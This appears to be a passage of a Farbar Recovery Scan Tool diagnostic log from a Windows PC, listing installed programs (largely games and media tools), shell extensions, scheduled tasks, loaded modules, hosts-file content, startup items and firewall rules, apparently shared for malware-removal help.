Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst (HKLM-x32\...\NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst_is1) (Version:  - Namco Bandai Games)
NBA 2K14 (HKLM-x32\...\{4FE0545A-1BF3-4B9B-A044-6E1EE719E197}) (Version: 1.0.0 - 2K Sports)
Need for Speed™ Most Wanted (HKLM-x32\...\{FB0127F3-985B-44CE-AE29-378CAF60B361}) (Version: 1.5.0.0 - Electronic Arts)
NEKOPARA Vol. 1 (HKLM-x32\...\TkVLT1BBUkFWb2wx_is1) (Version: 1 - )
NEKOPARA Vol. 2 (HKLM\...\bmVrb3BhcmF2b2wy_is1) (Version: 1 - )
NEKOPARA Vol.3 (HKLM\...\DARKSiDERS - NEKOPARA Vol.3) (Version:  - DARKSiDERS)
NetCut 2.1.4 (HKLM-x32\...\NetCut_is1) (Version:  - arcai.com)
NewBlue Titler Pro for Windows (HKLM-x32\...\NewBlue Titler Pro for Windows) (Version: 1.0 - NewBlue)
NewBlue Video Essentials for Windows (HKLM-x32\...\NewBlue Video Essentials for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials V for Windows (HKLM-x32\...\NewBlue Video Essentials V for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials VI for Windows (HKLM-x32\...\NewBlue Video Essentials VI for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials VII for Windows (HKLM-x32\...\NewBlue Video Essentials VII for Windows) (Version: 3.0 - NewBlue)
NVIDIA 3D Vision Driver 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Graphics Driver 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OpenIV (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\OpenIV) (Version: 2.9.907 - .black/OpenIV Team)
OpenVPN 2.3.12-I602  (HKLM-x32\...\OpenVPN) (Version: 2.3.12-I602 - )
Origin (HKLM-x32\...\Origin) (Version: 10.4.12.59996 - Electronic Arts, Inc.)
osu! (HKLM-x32\...\{7ffcd5ea-283b-4abf-872c-28f24ee6a8c8}) (Version: latest - ppy Pty Ltd)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outlast (HKLM-x32\...\Outlast_is1) (Version:  - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.6 - Power Software Ltd)
Pro Evolution Soccer 2013 (HKLM-x32\...\{C2523AE6-F335-4D0B-BC15-1C07E4ACE629}) (Version: 1.00.0000 - KONAMI)
proDAD Adorage 3.0 (64bit) (HKLM\...\proDAD-Adorage-3.0) (Version: 3.0.114.1 - proDAD GmbH)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Pure Chess Grandmaster Edition (HKLM-x32\...\Pure Chess Grandmaster Edition_is1) (Version:  - )
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.0 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.31 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7564 - Realtek Semiconductor Corp.)
RESIDENT EVIL 5 (HKLM-x32\...\{AC08BBA0-96B9-431A-A7D0-D8598E493775}) (Version: 1.0.0.129 - CAPCOM CO., LTD.)
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_is1) (Version: Resident Evil 6 - )
Resident Evil Revelations 2 - Complete version 1.0.0 (HKLM-x32\...\Resident Evil Revelations 2 - Complete_is1) (Version: 1.0.0 - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
Sades 7.1CH Gaming Headset (HKLM-x32\...\{71B53BA8-4BE3-49AF-BC3E-07F392006620}) (Version: 1.00.0019 - SHENZHEN SADES DIGITAL TECHNOLOGY CO.,LTD)
ScpToolkit (HKLM\...\{1EA84ED4-28D4-4836-BF8B-0E31BF1704C5}) (Version: 1.7.277.16103 - Nefarius Software Solutions)
SketchUp 2017 (HKLM\...\{BCA90A4C-9C6A-49D1-91F9-594A0BE02432}) (Version: 17.1.174 - Trimble, Inc.)
Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.)
Sniper Ghost Warrior 2 (HKLM-x32\...\Sniper Ghost Warrior 2_is1) (Version:  - )
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Splinter Cell Conviction (HKLM-x32\...\Splinter Cell Conviction_R.G. Shift_is1) (Version:  - R.G. Shift, Galfimbul)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steam Customizer (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Steam Customizer) (Version: 1.00.00.00 - Blumont)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Crew (Worldwide) (HKLM-x32\...\Uplay Install 413) (Version:  - Ubisoft)
The Walking Dead - Season 2 (HKLM-x32\...\The Walking Dead - Season 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
The Walking Dead (HKLM-x32\...\The Walking Dead_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
This War of Mine (HKLM-x32\...\This War of Mine_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.04.000 - Ubisoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
USB Game Controller (HKLM-x32\...\{95CC887F-91B2-45E9-AE29-0D51995192CB}) (Version: 2005.05.26 - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Walking Dead: A New Frontier (HKLM-x32\...\Walking Dead: A New Frontier_is1) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Windows Driver Package - Dell Inc (DellRbtn) HIDClass  (05/04/2015 1.4.2) (HKLM\...\70CCEEBCDF8A7D01F9CCA083F90CBABE40EAC5EB) (Version: 05/04/2015 1.4.2 - Dell Inc)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wireshark 2.2.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 2.2.5 - The Wireshark developer community, hxxps://www.wireshark.org)
Wondershare MobileGo(Version 8.2.3) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.2.3 - Wondershare)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2017-06-23] (Tonec Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-07-19] (Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-07-19] (Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-07] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {071F7B60-51EF-40B9-A497-F0113DA60282} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {236756A9-D7FC-4648-817E-F42BFDF69327} - System32\Tasks\UninstMiniWifi => C:\Users\AEZIAA~1\AppData\Local\Temp\MUBDC0.bat <==== ATTENTION
Task: {2CF1904A-F92A-4404-9B48-D7F4DF4BA7D0} - System32\Tasks\{F5F8BCC3-5972-4525-8741-F6E51B56A640} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\SQUARE ENIX\Final Fantasy XIII-2\FFXiii2Launcher.exe" -d "C:\Program Files (x86)\SQUARE ENIX\Final Fantasy XIII-2"
Task: {37795B9A-E9C2-4990-BE2E-AA30ACE60470} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-21] (Google Inc.)
Task: {3B3BF334-AB1E-4AD1-ACC7-40F67EF8E7F3} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation)
Task: {436D0683-536A-45ED-90D2-BEDBFDEEAD04} - System32\Tasks\{72CA1D33-A59E-4B21-80C6-621E26795DA2} => C:\WINDOWS\system32\pcalua.exe -a "E:\Secret Games\NBA2K14\rld-nba2k14\setup.exe" -d "E:\Secret Games\NBA2K14\rld-nba2k14"
Task: {55F64744-2CA8-4E10-9165-44A26AE45F0F} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-07-23] (Realtek Semiconductor)
Task: {5F36212B-1521-45B3-94CA-882C23E804AF} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-27] (NVIDIA Corporation)
Task: {5FC48E09-38CC-4046-96B1-01FCD4DA84E1} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-27] (NVIDIA Corporation)
Task: {6CF749C9-7DEA-4E05-A476-89590EC80794} - System32\Tasks\Microsoft\Windows\rempl\shell => C:\Program Files\rempl\remsh.exe [2017-07-12] (Microsoft Corporation)
Task: {7067686B-B393-4DD3-A578-4BC84F8BFEE9} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-27] (NVIDIA Corporation)
Task: {7D7B41AF-1CD7-4F0E-8C87-90FD7EBEF4ED} - System32\Tasks\ScpUpdater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-04-12] (Nefarius Software Solutions)
Task: {876ADB2F-302C-4575-A9D4-C932BB7ED81E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-27] (NVIDIA Corporation)
Task: {A72280CF-8E3A-485C-9F7C-24278CEEF3C5} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-27] (NVIDIA Corporation)
Task: {AB0ACC87-66E2-498C-B6C5-51346A51598C} - System32\Tasks\Shutdown => C:\Windows\System32\shutdown.exe [2017-03-19] (Microsoft Corporation)
Task: {AD9E3FDE-8587-4684-8C55-990964B3F864} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-27] (NVIDIA Corporation)
Task: {B1049EEB-C4C4-4878-8B07-F6AF1E4409E0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-27] (NVIDIA Corporation)
Task: {BFDD085A-B9D8-49E0-B7B8-0BE1EE83F669} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-27] (Piriform Ltd)
Task: {C18E2C0E-4D43-4308-95EF-3BAE7E517C64} - System32\Tasks\Microsoft\Windows\rempl\shell-unlock => C:\Program Files\rempl\remsh.exe [2017-07-12] (Microsoft Corporation)
Task: {D4E80BC5-50F1-44B1-B992-804F194AC2A9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-21] (Google Inc.)
Task: {F3BA7107-A730-40C9-A47B-25CD1A399833} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-27] (NVIDIA Corporation)
Task: {FC73A8C6-72ED-4595-9CA2-698FBE893184} - System32\Tasks\Baidu LiveUpdate => C:\Program [Argument = Files (x86)\Baidu WiFiHotspot\liveupdate.exe]
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\RunDFS.job => cmd /c sc start Dell Foundation ServicesWORKGROUP AEZIA
Task: C:\WINDOWS\Tasks\ScpUpdater.job => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-12-11 14:14 - 2017-05-25 20:59 - 000066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-12-11 14:14 - 2017-05-25 21:00 - 000103736 _____ () C:\WINDOWS\SysWOW64\PnkBstrB.exe
2017-08-06 14:05 - 2017-07-27 00:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-11-01 02:45 - 2016-11-01 02:45 - 000592384 _____ () C:\ProgramData\MEGAsync\ShellExtX64.dll
2017-03-19 03:58 - 2017-03-19 03:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-19 03:59 - 2017-03-19 09:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-07 16:47 - 2016-11-07 16:47 - 000401920 _____ () C:\WINDOWS\system32\igfxTray.exe
2017-08-30 05:56 - 2017-08-23 15:48 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.113\libglesv2.dll
2017-08-30 05:56 - 2017-08-23 15:48 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.113\libegl.dll
2015-03-07 07:07 - 2015-03-07 07:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2016-08-30 07:17 - 2016-08-30 07:17 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 07:07 - 2015-03-07 07:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2016-08-30 07:17 - 2016-08-30 07:17 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2016-11-12 18:01 - 2014-11-10 10:52 - 002341376 ____N () C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe
2016-01-06 23:41 - 2016-01-06 23:41 - 000062168 _____ () C:\Program Files\CCleaner\branding.dll
2016-11-23 15:44 - 2016-11-23 15:44 - 000166520 _____ () C:\Program Files (x86)\Hotspot Shield\bin\CrashRpt1403.dll
2015-06-24 01:07 - 2015-06-24 01:07 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2017-08-06 14:05 - 2017-07-27 00:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-10-30 14:24 - 2016-12-17 21:56 - 000000853 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 cap.cyberlink.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Aezia Aznan\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{7d1213e5-5eb6-440a-8279-40449e233bb1}.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "MobileGo Service.lnk"
HKLM\...\StartupApproved\StartupFolder: => "ScpToolkit Tray Notifications.lnk"
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKLM\...\StartupApproved\Run32: => "jswtrayutil"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "DriverAgent Plus"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_47C3CADE9C76B60CAF4A436AF4AD6798"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "Skype"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{821C9047-C7A1-4C12-BB64-C012FC1FCB8D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{56A454D2-84EC-4FFD-B433-B32E15393989}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AA31711E-9076-4F79-86EF-41D09B7DD614}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EC4A4964-A04A-4923-BED1-FF30DBC37529}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{65785D17-AD91-48A5-8C50-CAB08242D655}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{826FD03C-3F7E-4271-944F-E001242C4DBC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D966B136-BB18-42B5-B5FF-A335446766F1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4C31D5F7-4617-4600-945C-796568A05803}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{DEAE704E-F18F-4E84-BEA8-938B642FDA9C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F9C5572-AD42-40BB-8F27-3261E3E0027E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{8B85871A-3F65-4108-BC74-E9311038BE9D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{89248A83-16F3-4F9C-944C-124E7786D725}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{617DD04D-9F11-4912-8CBF-DF47E0FC4D54}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{DFD9C644-4E26-4AC9-835F-72784342D36A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [UDP Query User{2C8DF3A3-2B53-46E8-885A-A327D02E789D}C:\program files (x86)\wondershare\mobilego\mobilego.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilego.exe
FirewallRules: [TCP Query User{87BC19C6-A522-4C50-BC6F-C42EFC7F0581}C:\program files (x86)\wondershare\mobilego\mobilego.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilego.exe
FirewallRules: [{56D0C921-664C-4F5B-94C1-500EF1190BFF}] => (Allow) E:\Aezia's Game\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{8DA821B1-7A43-41EA-8AA3-41B4A7D78D17}] => (Allow) E:\Aezia's Game\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{A5EDBCF7-8A56-4C4C-9033-602DB8B46D74}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{25C8698D-C7DE-4BEF-9FA9-9A86566FE43E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6627EF12-B719-4512-A118-6D249F8EC7C1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{201923CD-98DC-44D9-AE9D-9E5295109AF8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1E75D466-CEA5-47D2-8658-560F490A9915}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{67A800C1-7EB1-4D44-A1EE-50FE162E4280}] => (Allow) %systemroot%\system32\alg.exe
